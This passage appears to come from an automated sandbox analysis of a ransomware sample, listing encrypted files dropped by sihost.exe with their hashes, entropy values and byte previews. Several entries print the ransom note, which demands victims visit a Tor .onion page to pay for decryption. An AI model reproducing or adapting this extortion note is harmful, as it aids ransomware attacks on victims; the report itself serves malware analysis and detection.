                                                                                                Preview: ...../....F.B.....Ri./R......}.j..Io..K..B...%.w..>..=......^[...n..\..W..\D.....0...dg(.....wo.\....Y.C.Xp...=..G.......k6X..9.*.2..fW.[..~y.4....X..#...._=...6..N..........S..I. .Htc.j..*..7h|E.n.....k:..`....O..3|...|.1.V..7C~=..\.A.(c#jw.../.@.r....D...a-.y.j-ew^....*..jpO.S...}B*..h\n..6..6.A.5..<Y......+d..qd<T.X.z.yv...u>....;Cs....y.....W]........|.k.7.i..8...'.......O./..X.g....{....>..4..M[.9..Zk;.g.@zQ.9....L.h..U..K....{L...N....Y...6..N.2.=!D.(.'.IW3.{...g......(Na.s.k&..T..>..Wr.+.G..qT.o.P.I3..$cq90+......#..._.z.....Z......X...M..o...;.s.a.. .P......X......?+U..Mm.8.......P+Y..G.H.R/!...E..*]o.spT.2.:..dg..j...p[....i.Z.%.L....r...Lk.....Q...l..0<.U.gy..i.$....'..rf.&.D.......{&..\.....l{.....Mm./}....-nY....)...Z...zz.X.s6..r-.........F.V.h...%5$.<...c..p..a;#...jT.p...C:6.."G.v........y .o..".`X.BD.BJ..H$<..91|uP.....y..6..A^..F6T+}.?.rK.B.Z...b.mx.g.....g.....#...#..5..Gx....r+Q.7.........^m..............G+..............
                                                                                                C:\Users\user\Documents\LSBIHQFDVT\QNCYCDFIJJ.xlsx
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.84028003152683
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:UJZhUPlHedrZ7kIe2WuljxmDZUSH6okw6dsV3Y2PrMa1ykJP7HMTgRhEYy:qZo8rkIe/u6VUbHmVI2JEkd7HMTgR2D
                                                                                                MD5:DAB90FFB32CC56C44B9DF82EABD7B5C0
                                                                                                SHA1:E3E6242865FD141D64EAC8F77C755565050C0C25
                                                                                                SHA-256:AFCA9BB6FBB8119AB34C47C65677D5E074A9584546DFD26B6C496CC9A7758CA0
                                                                                                SHA-512:92E653D87EC9EFD658DFD3CBB05B38499DBC97CD4C1912DE7CB65F7427081CF1515CEBCDDF017E710C57A81C2844232237BF1D8D2C11638D0AA8AC8C10B8CA5F
                                                                                                Malicious:false
                                                                                                Preview: ...I{Z.[)W....a.u...T.(.R5..B$.H}[...pGA..I...{F?H....JH.~n."&<U.O#.n.`XTaX@qE..o\YX..|NAi.l..d;...tH.`j.W. .\i.......QcY7.5".d...."S.3%:)l\^..,mT.NCU..|...[.[.5.)..5..U.U.....4zu.B..^.r..I..=7.I.B..g...w....cI..}Ta.B..[Uk..._^dH..A...Y.c....n.Y,.C.z.:.A.PY.b..6.M....h.V.d.V.a].i.AUl.-].u@...p....\?..G......0........4..I..3.....!.K.`....2.z,....=.c.......bs.>.#..m$5....V.h...9.X...V...Y.{.........*.x.2?......R..J.{. ....Wl.0...|......&U:..0g].xO.%t.)...bW./.......=..0...2......F.D.}`H..... ...M5..C...yM.C!..,.".!.].(3Wa....W{...R)).ZH.5.|...>..y...Kj.;..muL...\..E.. .h..7_="'k.w...N......N...7ZV.....s..lf.8.nI.$.?.._4e......XV.+m@...@9..AVT..Mz.X_..`...S..h......B..a.M.@..L..,..B.8q.c.|.QA..5.....D..3..KE..(...e....u..".r....D.O.....x...1....^..;3=..U.RU.[.......A.6|.B..W}....11....b.>.c.)..'U..~.CO.|x...:7..#H...%..#...>...:..7..eM..t.m.W...>.../...m............?'.z /.....l[..\.!...0)`..xb...]..../<a.........6..}_.s.....|..v.gF_.....
                                                                                                C:\Users\user\Documents\LSBIHQFDVT\SQSJKEBWDT.jpg
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.858606899605877
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:nDF6+FyqUasyk6p5ROWg1vALHkDVNH7HlortaXF3i0XiKw:nDjuasybYILHkfDyrtqFS0XiKw
                                                                                                MD5:F499B3C27BFD38CCA2097523F0A0B9F2
                                                                                                SHA1:CA3FE9E0DD80ECB850229BC19D59144A7071DF97
                                                                                                SHA-256:C248655E9A8DDEBC560DF721297B7CA7E7057407DBF27BD6923BD8D1BAECD179
                                                                                                SHA-512:A294DD4A89F7FEE69203B0B0FE694ED06E7A433C01D61A090C831C6F03E4BC081FD85FE7A20C41433CDD7B2978F595B00FC8B022897851887C22DBAD0578DB75
                                                                                                Malicious:false
                                                                                                Preview: ..5.....!..~{3...M.Y..t...o.......q...0.+......k..w..W..)o.8.B...:1D].......\X.M.#..#..z.F...7....ii.]....}...0..........8..+XxS.n..@(....C.....d..Ds.u:..."b.k./.R%.Wv...l$.....,y....P.....!.z.....$l..{.,.......'.c.@...'....i..l......A:.."..u.....`U...b.Q.:.....X.z........qK..t..PQ...D;.....R....HyJ..B.......6...x.....7.}.. ........&#fY,~I..K.1._.{=....2R3e8e7...f.T.G.x.T...........nSO,g.-.Iq.}..A.W.w.F..5..gP../PW::..Y?...#.R....^..\....../>..R'.<!}$.OX..l......Y.B...px7.!..N..g......G.......J..c.,.:....S...fc/...8`.>...|..].RD..Z.vP..L.\.Y..#3..3.....Z.0.._..o.<.W.C5..!.....1-....b.H..;.....@.............?..,....b..q.f.v.t....u.....`....Z.....<...-.?......'..v..4...U..S.&r....u....2@....X.w...s.~.Bc......'.k B.E..E...%..s.(.a@..F...5_..F...q`<...y.:...o.=?i"..&.(..). . ...*?.*...=....Ma.. .u.K.^..l^^jo.."^-....S...b\6..%..U.G)k.V.Ky0..d.......m...k.....W......k..>..O.Y....G.u.l '...K.S)~S..{B.........U..8.......\T."G..I
                                                                                                C:\Users\user\Documents\LSBIHQFDVT\SUAVTZKNFL.pdf
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.836749634799338
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:iq0FCl11DJPYo+8Lx5johlf4lBCWOMSJlBGbJFhwLSrODn+4volRi7cZnS:QU7FJgo+8l56lfE8LMSIbJFhwGrpzVS
                                                                                                MD5:CC34864CA37FF6468952761D148B97A5
                                                                                                SHA1:62D24C618851F31B8652958880CCD49043A8EFEC
                                                                                                SHA-256:2BBB5A8477E341061506FAFE28B232D28AD8C9D93FBFFD1E1AB5BF89E7605663
                                                                                                SHA-512:DE4F0D9D01FBCB8EB5350197D095BC01A1DA7DC209BD9AE60DD04D4248F906A5A0F43596B4EE56594F90BDD1B8E65D8AD7B5B7B664EFB2F92E4D6FD05C8E0881
                                                                                                Malicious:false
                                                                                                Preview: ..c.....`L.._...#....X3..Y.v....IV.@......Y.Q...L.U..F...-bQ.R5...hL.....!.n..1...:..la..l.?.m..v|bF.[dY<.(8...M.G?W....-..6JlW....l.F.Y...j>yq...3....6....u...!.!*....B....s(........r...4...h....@S..k..h. %..U.v...P{.L..m.....y...j.P/%...'Z....$N......jvW.....rs....k_..}^....tH.....9.....w....,....h...:.p..s{....bSz....E......H.*ue.dEjo.9..<.\H..J.....I...m.>..%4......Q..4f3...a+hRc.[W..#..y..f...:A:....A.o*..C.D..)...*^(.p6..[/.[G@........Xi.Bq...!....`.4'..z..|.........t.BX...L..bM../Y...9.m.4....Q*........p.s..lq.5. :UG.7.......n..~..DP?(.fK......&.$^+..6.pll.H.HV?...6....U.1e.!'>b....<U....3..(/.[.B%r.9U..k.=....+~.'.......<..T.^..h6.."a.. ....H........m.{O..^......G.pD4.\w.t....V.....6.9....*...v....!P-...1...O......-.Gv.#.....[...y.A.w..#..Q..0...x.B.wR^g.K..v...`.ln.'{...}6{..w..G2."=.U5.....d_("......s.u2.....p..M..`.....&V...*...7D.c.lt.O..A......pZ.LQl./...o..V.k[.$5K.S..'.f...t..+.=#...PF.....?.......rA<.>..^."..G.b.Yz..
                                                                                                C:\Users\user\Documents\LSBIHQFDVT\readme.txt
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):3004
                                                                                                Entropy (8bit):4.834891694847581
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:eUimvpiIXMwOH+QMHw0dHrHeH+lgE0UimvpiIXMwOH+QMHw0dHrHeH+lgEV:erWxnOEbL+AsrWxnOEbL+At
                                                                                                MD5:62318A9E589ED3CE4D5AED91188DB708
                                                                                                SHA1:1C51B8F63FB9DD87C9BBF9714B03D082BBABEDF8
                                                                                                SHA-256:E7AE9C658A09C776DCA83794E0FD41DD2E8E0CB888626BDF07650E564B4585FA
                                                                                                SHA-512:5BA95687AF6C750F0DD91825B9F72AABC17B17226FB6FEB7E5AB98DD4F1028C763C4BA72CA0A102F6AC33C8925FB1B2EEEABA5C0E25D3B848B0AF0F2681B02AB
                                                                                                Malicious:false
                                                                                                Preview: ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED!.. ====================================================================================================.. Your files are NOT damaged! Your files are modified only. This modification is reversible..... The only 1 way to decrypt your files is to receive the private key and decryption program..... Any attempts to restore your files with the third party software will be fatal for your files!.. ====================================================================================================.. To receive the private key and decryption program follow the instructions below:.... 1. Download "Tor Browser" from https://www.torproject.org/ and install it..... 2. In the "Tor Browser" open your personal page here:...... http://aec850e8ac806e10a87438b00eltalkfzj.n5fnrf4l7bdjhelx.onion/eltalkfzj...... Note! This page is available via "Tor Browser" only... =============================================================
                                                                                                C:\Users\user\Documents\NEBFQQYWPS.docx
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.860162591310388
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:BX/DJqu3xVZsjDntbrij7ef8GUrWbYIfz/4D2eLliC2ZXddo96axoq3Pz2YLbtp5:h1r3RATtOEXIW7fz/4D2KkVZXd2NxVbZ
                                                                                                MD5:1AAEA43ECD9378F5CC7083E139902ADA
                                                                                                SHA1:8FE86573DE4E5F17692AAA46F3B32D713BB5AEEA
                                                                                                SHA-256:FD5C697848A5ED8A0F32563FAD7066101091C4B247778A4FEA4A41D689C61694
                                                                                                SHA-512:2F13D1F482E1C564B488835CEB64C3827702C42DA0F059D33FD6BA2B427FE78DE251ECF23F533705D3402DD1BA3268ECB382438C38F8CA70E94A8EC3BC1800BB
                                                                                                Malicious:false
                                                                                                Preview: .x...c._]d.-.W...}3&..:.I."V^.G..j5......Y%|],B..m..T:..t...n...O.5.(I..-..._.NF\.!..J~.0...."^x.b%..........5...f.K....ng..RP'.SI..x:p.......I....ksu.v..w..2Jr:..bh\.Z....+.......u[l...._c.L...,...#V...6M-.e.P7......?K......fn...!..o.X.C$..tB9..B....m...G...9{..N.Jd.v.....M..1.{.F.6kC..O..A.#2.C..Q.v*).........-]n".....d.6.p...%gi.*,.Q3{....07...R.A...l.i(..i6.0@.7.A...(wS.U...sV.f....`2....p^@-...9..._..$I..D..\...B..$..W.nJ..*. .8.!...~_T.6.=V..*@...OdY....k.\;.._.\.D8...U.5.l..y.k.%w.uBF`,....e. r7}...@(.-.S. ..J9..Z.Vkw..31.=.}...N..z.=J....`.Vg.}.j..!D.O.v.TWp.l.y.<.3.O.=...5..zBCS5.....!.g..:....M.a..(J.......R..H1....S.@?.Z.8.T...S&9.^.p*...-88..c..~..cx,...2ce3@HG.|...O.....G.m.F..q......\!c.8Z9..8.9..X.....S..>..5..6(..o..L..jh..|...K.ql.T..9.A..l.~.#.I.]..c..N.%W.!.....h..+&6]...w.9........j......Go..f.xG...,5z>.{.!.q}....VU...J...K.G.....o......'.1.4.O...n.vh\.....a..g5R...|Y8.3..v.pM....w....K.....b...:]..r\...p>...a.o..}.?.X<.
                                                                                                C:\Users\user\Documents\NEBFQQYWPS.xlsx
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.84046254448587
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:M5vvkd/NsvjckfJ8vx51NsKewcIj5sCiQD630U+58lI4A5iMfkM:Mxva4ckfJmP1DewfFsCi5658HAlcM
                                                                                                MD5:FC4F245BD4F6E01D2C389A39B25252F5
                                                                                                SHA1:D82351AB06B83BAFBDE964838EDA9D968773A7D0
                                                                                                SHA-256:3A21129774A83A3C9D9B2860EAFA8A4807B3F9FBF8A7AA6201EC1D0C514E99AF
                                                                                                SHA-512:178ACCB24E0C7B4C592A4E1A8BB43DA61AB0F7EFEC37CC28090FF795E33191C39588289D3F4AA0D5F904605C240245A7622303379F6AFD40F11CBFD45A102C15
                                                                                                Malicious:false
                                                                                                Preview: ..it...5).......4..V...%.G...j...#...(yV..-.d..o8|..6.1...^..bm....5!X...e^....RD.K.t.t88......mM....Q7I.0.EU.e.xm....VDt...$......=x"...T..5...N.H...#@.-g......"..4^C.,...wmu.....&.....^.H.;.w..9...-.l....y[........c@~..'..._.o...Q3.....i..$...:....gc<.....q .6....d.P.;.."... .L.....naW..........#R.".>~u.^7....z.......Q.o........kE..R.}.V.'+...^..1.C..I...a;B.......j..j._;:Z.W5V>4N......: ..{..}.I......1.r...S]..X.*E.V.T6..R........u...w......K....|?.........sV.+.Q.+.M....K.tt,7..'$4e.,..e.Y....=X.g^.W>`k?=g..V^W{o..l.&.g..z.&.`Ew~?...*gjV.Q.~..TP..%.......<.6..E.(.._,d..]o.\a...wyc?....<.fqa.L..3.............u1..j.%..Z......`..3mZ...5......i8S..*....".sd^.(..:.yA...,B9......D).eq4^.Z_.Fr?>..~....g.q..._.t........r6d.r...X.....f...,<....U.r3.4Q,..<..uE..A....@F.[....... ...N.<7_.j.....A.Q...T$...Gi.....-b..i...cAf.YSS.....9P_..!.Md..{."0.....L!. r.c.2.fp..wU.y.2_..:p=...c.n..."..Uby.l...yx+,.+'.y'Q.....5..Ey...j.YB.b..+..E...". .Q.
                                                                                                C:\Users\user\Documents\NEBFQQYWPS\NEBFQQYWPS.docx
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.842650978637729
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:wskIMTf8m348Y9wm99fwtyQjn9xn6OXcZv30IlZ4tFgrxfTkEMlUXAj4QgZImC3Y:w0MT818kwm9qvjrXcZvE2Z47gavPjNgZ
                                                                                                MD5:9662A5D86F4A9D7B9FB3AAB32F5E7972
                                                                                                SHA1:7126F3CC48372C358754ABBEF7B7D122DFC49188
                                                                                                SHA-256:4A0F6B52FF0A92407A5F3CCE0D537531F4BE1525C840E6DA0E9D3C10BC512E30
                                                                                                SHA-512:14038C414C7E1C0C9176CB1F632A34912811799A33684F8E774440EDADC7E50C862BD32520749D8EE76AAC8C03EA23C0BAB5925ECC0454C9D31FFCCDAE9FA7D1
                                                                                                Malicious:false
                                                                                                Preview: ....U1...Z.&..m..n.l+..d...0 ..{+??<......~..@...i.-x....Z/y~.......Q.....b..j.a..=g.n.....)*.en.-....M.m.xU.....=.`ux.(....u....n?..a....J:..%5.<f\.....X..-....9m..Y.,z..L..r|a..783.0....Y...9.!.u..~] .d....c8...5..5zp..<.....#..N4.[......r.td.I.....J....$.%.m..+........]..1R...V8U.......p%i....3hF7#...#.O2.fZ!....v.s~.2../.....E..Q.....g....._s~d[........}.Q.._.i.hM.yZ.KJ......[..5...BIl.......U.P..:.g..2K.f...k.w.''.....Z..[.$@...ZI9..#....<.j........;.B!y..&....@{.Ou... .L..J.^[..b....%..b<.J..7....1K7.x.&.S[r..\..I.u2..j..r.#.......B.?Lo....3.h.."...=.;.&T....i.....(V....mM!....(5..<..6N..<ILk.v&3...b.]3...AI...Q..o!....'.Z.~u.o..'.._........H]Sp.[[vC.#.&.]n..........h+......1.O...(..?......,..p4..9...&W.,.I..'....P.&.e.z....*...8....V8C..dk.....~/D...X..:...":..u..5.....a.....B_...u(......p.......C..-,C...M........W.^^h..=.....wa.4...6..o8..lWD.S=.h..R.AR..A.!..o)..o H.s...<...rf.....E..S.......XU.S.....Y6.t.u...7>[TP.(...M.f.F..4'.7.C...T..
                                                                                                C:\Users\user\Documents\NEBFQQYWPS\PIVFAGEAAV.png
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.845789735761763
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:aHqM9pGm6Gx36TpmuugZiOxnN0heyeHkcG9pJbJU6Tnr0GBdg7Mr:aR9hxKQuuIT0sjHj+TbJU6T4Gk7y
                                                                                                MD5:13C1F58A3186AD348B218FFD56A6DC94
                                                                                                SHA1:1607ACAEBC12451E6904DE64A2654A092DC0F5FA
                                                                                                SHA-256:DE37B93AAC2B660623CDAACFAB14CD93DAC66E17C78CBFFED854F1317B9315F0
                                                                                                SHA-512:FC13FC3949641C3E5163681B81EBEE9015AA1F16F91F0A728980200367F88D2BA6D211E210E367DB428DC37E304259B6BD37703062048E6D5E714D2A15B40BD9
                                                                                                Malicious:false
                                                                                                Preview: c.t.<.y.aBvC.n*P..7.......t..[.Lz!=.SZ.........uMP..z...d..n,...48.R....i....!Um.o.V...%..!@.]@...D.....".w._........f. TA.....]....6.J....aE..8y51....V.T...):..u....D....r.*S_H......Y....2s....e.C..VJ.......0.;I...l.b.../...+.......jR..%.t...w...`...{i;q?..n.G8....K...,.v.IuJ.],..\..4=lJ...bJ..........R.T\.._.....FE0S...1.L......}..H...%<n..2")..k.N&.....I.zF....;.....%.\~.N...w%<5...j..%.iq,..8g~...RV.J..e.0...B....}.....c..=.>......k.....^I...x+k...@.............+.o.....9,8...v...OC'..a....H.....3L..SH......}..D#C R.i.....M.pw.h..U..9.C.u..T>6X......Ou...E+..HRD..."...G....v.xN..=......o..q/..W.8S7..@Te.....!.....$.-J........g....b5....5.3.@...Z.g.{@.P0..I6......$gA..[.M.....2.z....l..2..l.A3..Y;(x.rw.)i......n!.=..<a......Qm1~+......yl..|...G .....E.1..CH.-o.x....K....6.._d0....R..F=....2...d'I..m5..@.I0..K.[...87.4.....Q>... .O@.E.h..H..IA......%..U.....{.+).M...f.h.......A.GZ#K..wT...........1;._fVQSHD....?X.o.>...$...1YU,..|<..i..
                                                                                                C:\Users\user\Documents\NEBFQQYWPS\PWCCAWLGRE.jpg
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.851500152944476
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:ANx/Khr0q1FQwHzHDYnyWJ2Icre2q0QR8F4G/GS2hrLv2rHLVSyAs:Fhr0qcwHXYnr2IeKG/GLN2H5JAs
                                                                                                MD5:D61DB515A08C267708DC3833197F6636
                                                                                                SHA1:349CFBFD4BA86E84708BCF3F488C314514442D8D
                                                                                                SHA-256:446F8C4A53F4892BC89C46AF1629DC392F3336062DA95DAB85492420EC373B1F
                                                                                                SHA-512:FBD11B162AEFFC02AEA0B873DC3D0AA541AEB8ACBD70560BA79D0ACC04AF677A338D5B1713795A0F22CE0F5A631776CB818DEFA7DC2DECB6700B0E49665542A7
                                                                                                Malicious:false
                                                                                                Preview: .6...G......*n............{)p.}..,.....a .Q...o.!..#m.....V... ..<1. GX.0K+.Y_.}....r....b.j...CR..S.G..#i...X]y<......,.(...u...(...#.....|7...I..lU...w.S..L...X....'~n.............,.RR..u.?k....)..?.z.0...X.A.+...y....[).4..`...7...u..y.......I.........4....H.t/.1...4.{.7.&.F?..NM.u..{.e..Q.....#."1.P..o...v..}..C.[v.W..p.;?:.....i....di0.r........`\..M.i.tg.;H..B.._Sp........6.+T.-.=..p.g.......c..r...]....Mb.O..&*{....,.6..C./W.LED.K.S.fS .."..=O..D.B.\.8s.... #..B..k#.a7Sx{..A3K.g.a.B...|?2\....N....h).b.k.+%...1./U.#..'.&8../h.\.'..!B.V72.x..M.@{...gk..^j.7i.....&.E~..R..^.1...CZ8=...2...(...................^...#...Vt...V.Y..ln...+_..H.2.4...s..s.F.-......q.C.6........,.....$.p..T......,..llIX).1.7.g...K..".#.7..t..O2X0..DG..".....)N..O?.....<......)O. ..j-i|...^}.t...R.#.........6....6.0[......3..A3T<."...}..1[I...4...n.......+..~.BsTR..`...M..\..ZuT....H...M.J.C(X.!...K...H5..rY..G.....2...8..d.[&.?)M.BK.....-.Z..:..}..I.?.8.BG
                                                                                                C:\Users\user\Documents\NEBFQQYWPS\QNCYCDFIJJ.pdf
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.846962049983888
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:2ZqX4zQldjHP5I7xL5uV8yKbItMS1jKVxCuNsu12F/BBIlDgkjlz:SqX4zQl90v6fjKVPNihBazz
                                                                                                MD5:A17A510DBCF91F53E799830E0674AB47
                                                                                                SHA1:82AF1AE9832D7F9FBB7B80F3E28B61FB957D08E6
                                                                                                SHA-256:3B1817FD465FBCA75D581E17256814A78D398C896D5A6AA57DE4C08326A91EA4
                                                                                                SHA-512:E808BBC2796ECB1FA96160BF1AFABFDFBCD3431EE9733231F18F79A09D0061597CE3098B425921C737ECFCDE1FF72352F090D56163D7A931EB9CDD6B4FCCEFC9
                                                                                                Malicious:false
                                                                                                Preview: .lJ.(<.\2#\....0K...!.......p......'... .D...;..._..S.....].|..W...MKOn..sW.iQK#.......%Y.D.hj..1.TJS..*...~..m."...U]s.....ucv.[*...g..!..:....Q...'F....q.C.`..0.@y.P%.....(.4.D.............U.._K..n:.!.j.!?S.E..K.0......S.i.'..)aM.....a^p.......+B..h......z..O...R...F..MW.O8..s.`ZX@,d..*..c...*... 1-sk..a>G.o......RK4...@.+F9.G.BJ.uW(..J 9.V7...!s..;..<. .3.?L....{.z....M.>r.hEb0W...'.....>t..k.(h.."ZL..}9..-.U..0!.kVK.@.V...d._.+.5..#.]).i.9...%n..*.{..n.ws..e8.M..J........q2....K.2....zB...Y.].QMt....|aD.......F..i[<.$.....G.EI......\.....%./.......$...n.L..b..dq..wI....g?...bo.Y*5......o.#..%.rx.I...Y../.r..b..Z...-_>..........v.*.9.....{.4......jaJ"...O...."..8.}.Y.g.u....{........X}.....W..<....Bz'..h.......2.....C|..X#.(.).O.P.6.....VIQed._..6.>.........N.....4I.d....../....1..dre.o..#.........r8..J.....X=..,...o..\...%C....E.u.....r....{'..w].....j..^.<....].Z... .....nNx/...........uW.mz...E.....)D...r..yo......z..G....B........ *.
                                                                                                C:\Users\user\Documents\NEBFQQYWPS\ZQIXMVQGAH.xlsx
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.86480495833858
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:7/UDpq6TvSNWSPrzaLG1arJtJBByiGOGPbQyq9eHSBqPHid:767y/rWCytRLGDA9ZqCd
                                                                                                MD5:55AD64878378894B684F294F3A844256
                                                                                                SHA1:AC0AFD9E3D358C3EDC961E2AE58CFAEC8CCDCD16
                                                                                                SHA-256:8C6DE51AE3212E4004EA8D5253716BF81DF5992154DF55561EDB6E9D317E84E7
                                                                                                SHA-512:2934948325C0A23C1218618DB59118B6871571EF3AD3914B7FE6A98E9BF15C81AC8811073E2DA7677240267A3FA6DD6942CDEC8DE3F35FBA366F99861AF2D542
                                                                                                Malicious:false
                                                                                                Preview: .....R.Z}.....N^..>.;..j...[.W#...#/t......!..l.:i;..4.3.w....R..dE....B...QS...!...Ny...5^.z....MF.M/..........;.0>.5x.4d...p5........w..t...(w.p..&..u..P.(Zh...+.Z`...z).hL..OBW..Y....R%......q...p.f....H.=.G]..~9.....~...I..dkQ..k{%o.5....ko.d.`3..h..&K..5..F.(..,...)...u.[...#k.U..x.u..7%.n...Q...i.....o.....?r.M...6...3y.Gh.6...`...V...V..+D...t....V.w........,UX.......p'9......6@.O.].Z&/..%D...e..=...|j..#j.j..t../+.C....7"}...vF.p..]..\..]...Gn...D%...{..g........K.6.$..x.[......5 '....bo3......pk.8.........!'Di...........c|...9...:1zN....."{.L".X...+...2&{.+...c.0..P..a.;G .[q....b. .9O..H.....[Q N.G3..9j...fW....*I9j....x.\m~N..Y..@s.!...T.b..}J....u..,c]..3#...W.$..X...>.]U`.D@............j.bUZ.r..A6.p...P..D[..uP\o]&......U..K......."......|N...E,......17.......y.no.,A...y..7.c^..B~..l:..`.3c...s..b. .....g.av..".p..M...6..M......d...C|.y\.r.:..v........X......=E..N.`.\|4.=.*....>.Int]...Jr..C..)..X.....Yq.-..
                                                                                                C:\Users\user\Documents\NEBFQQYWPS\readme.txt
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):3004
                                                                                                Entropy (8bit):4.834891694847581
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:eUimvpiIXMwOH+QMHw0dHrHeH+lgE0UimvpiIXMwOH+QMHw0dHrHeH+lgEV:erWxnOEbL+AsrWxnOEbL+At
                                                                                                MD5:62318A9E589ED3CE4D5AED91188DB708
                                                                                                SHA1:1C51B8F63FB9DD87C9BBF9714B03D082BBABEDF8
                                                                                                SHA-256:E7AE9C658A09C776DCA83794E0FD41DD2E8E0CB888626BDF07650E564B4585FA
                                                                                                SHA-512:5BA95687AF6C750F0DD91825B9F72AABC17B17226FB6FEB7E5AB98DD4F1028C763C4BA72CA0A102F6AC33C8925FB1B2EEEABA5C0E25D3B848B0AF0F2681B02AB
                                                                                                Malicious:false
                                                                                                Preview: ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED!.. ====================================================================================================.. Your files are NOT damaged! Your files are modified only. This modification is reversible..... The only 1 way to decrypt your files is to receive the private key and decryption program..... Any attempts to restore your files with the third party software will be fatal for your files!.. ====================================================================================================.. To receive the private key and decryption program follow the instructions below:.... 1. Download "Tor Browser" from https://www.torproject.org/ and install it..... 2. In the "Tor Browser" open your personal page here:...... http://aec850e8ac806e10a87438b00eltalkfzj.n5fnrf4l7bdjhelx.onion/eltalkfzj...... Note! This page is available via "Tor Browser" only... =============================================================
                                                                                                C:\Users\user\Documents\PIVFAGEAAV.png
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.834738160710846
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:rIsbYguLm37e6d2qWBrh4k/Vh9/zwflE897cLpeLGIqIG1SMl7Y1vddGL3km:rls5LmLS3rX1ilXcqqIGt4FETkm
                                                                                                MD5:EB26D44244E565161ABE421F19FFA344
                                                                                                SHA1:B557E6F1E91A4E403A5801A3186F6FEEB66D1ABC
                                                                                                SHA-256:00B35761C0F300A9BCD71504CFB9169C28E56C613F02D4E066426A48A790D60F
                                                                                                SHA-512:7CC7458D389370522042C1AA7721E263B1DC5E754E243141203D1ADAD589BA4E996B3FB041DA85FDC0D2970EE5111F69B2B855D82795149226D1B6A0C8304C42
                                                                                                Malicious:false
                                                                                                Preview: ...h..h.K5...};..@......@.j.k.W.g .>..M...g.".....WY..$.:...f.3..M.Z...+.+........T.....4x6.S...%....;.U..7-.!^,..C.....OkM.....7..,.#.P....]..&..4...9.u....$h]....k...$E..C....4 i<|...u...........r.....Nx...q? ..^.&._..V....4.r.-LF.`...r..}.t.$e.jeO......j?..^...pM0.....rj...........R...'5`.......w.UL7v..a.r...V..>..........h...L^../..z.E.^F.t..k..Q.<....g.....T.;..y....W...\.J..Rb.......ys.q...prQ.JG.U..T....P..:.@.9..o...&3 .....2V..*.N....9...i....A`...e*.O..f....l.;_F.E......;g..^.;. ......X.Y.&Ei......1.C...k_\.....LLPf.?W....[~3..U.)...f..=.C. ..P....\b.o.3XF..#..S@n.<.B.\..T.3......H.m..U!i.g....5....^......N....=.?...6OZ...N.g...}[..c8]k..2.. ..x%..mO=NX.Te.V......X.O......O....p9qZu..+...4.~9J..w..I.9...yv.'.y...-.....N..ep0i....gnP.@..5..@.... .k..6.g.B...%....1].7L`.p..z.(..|.E`.....Kn.....(3.../.O.oB"....:.'h6..........v..}K........"........#.).#..<.o.....q<..4q..?%..}R.....1..... 5.U...q.B.....|.....Z..HI.:.c'..$#
                                                                                                C:\Users\user\Documents\PWCCAWLGRE.jpg
                                                                                                Process:C:\Windows\System32\sihost.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):7.839882686724072
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:jnPoqOSAZLE+M/6hJbBglmSBFcHIR3BQ1iPSp0tLWKscnsqR4PsyL:LPzOSOMO0B3Q1iPSp0Ocnsgiv
                                                                                                MD5:5E4DD90DFD64070D54EAA22C7C045CCA
                                                                                                SHA1:1ECCF6FF79B0B965C15DC32CB5FCFBBE8DC67DFF
                                                                                                SHA-256:4A74FD50EC32DC69FBD43BF64F72F8B24ADABE0A6A93A8168A19F93482C9D377
                                                                                                SHA-512:DB1A23643AA861A7F6308FF9871B44F1682DFDCCF727B4CE5A5AAFFED798CE09CA02724E981612CF1D7E4BEC8454D51620ADC0E13ED1FD2CA297D5B003364FE6
                                                                                                Malicious:false
